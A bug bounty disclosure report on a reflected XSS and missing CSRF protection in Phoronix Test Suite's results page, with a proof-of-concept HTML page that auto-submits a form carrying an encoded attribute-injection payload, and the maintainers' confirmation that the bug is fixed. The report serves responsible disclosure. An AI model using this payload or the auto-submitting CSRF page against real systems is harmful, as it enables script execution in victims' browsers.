Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Valid

Reported on

Feb 9th 2022

Description

Hi, i found a Reflected XSS vulnerability (POST based XSS + no CSRF token) in phoronix test suite, Results tab.

Proof of Concept

Install a local instance of phoronix
create a Search results form like this:
// PoC.html
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:8222/?results" method="POST">
      <input type="hidden" name="time_start" value="2022&#45;02&#45;08&quot;onfocus&#61;&quot;confirm&#40;origin&#41;&quot;autofocus&#61;&quot;" />
      <input type="hidden" name="time_end" value="2022-02-09" />
      <input type="hidden" name="containing_tests" value="testt" />
      <input type="hidden" name="result_limit" value="100" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
//
and send to victim. Victim click on the link resulting reflected cross site scripting.

Impact

This vulnerability is capable of Reflected XSS

We are processing your report and will contact the phoronix-test-suite team within 24 hours. a year ago

Andy modified the report

a year ago

We have contacted a member of the phoronix-test-suite team and are waiting to hear back a year ago

A phoronix-test-suite/phoronix-test-suite maintainer validated this vulnerability a year ago

Andy has been awarded the disclosure bounty

The fix bounty is now up for grabs

A phoronix-test-suite/phoronix-test-suite maintainer marked this as fixed in 10.8.2 with commit 1eac92 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

to join this conversation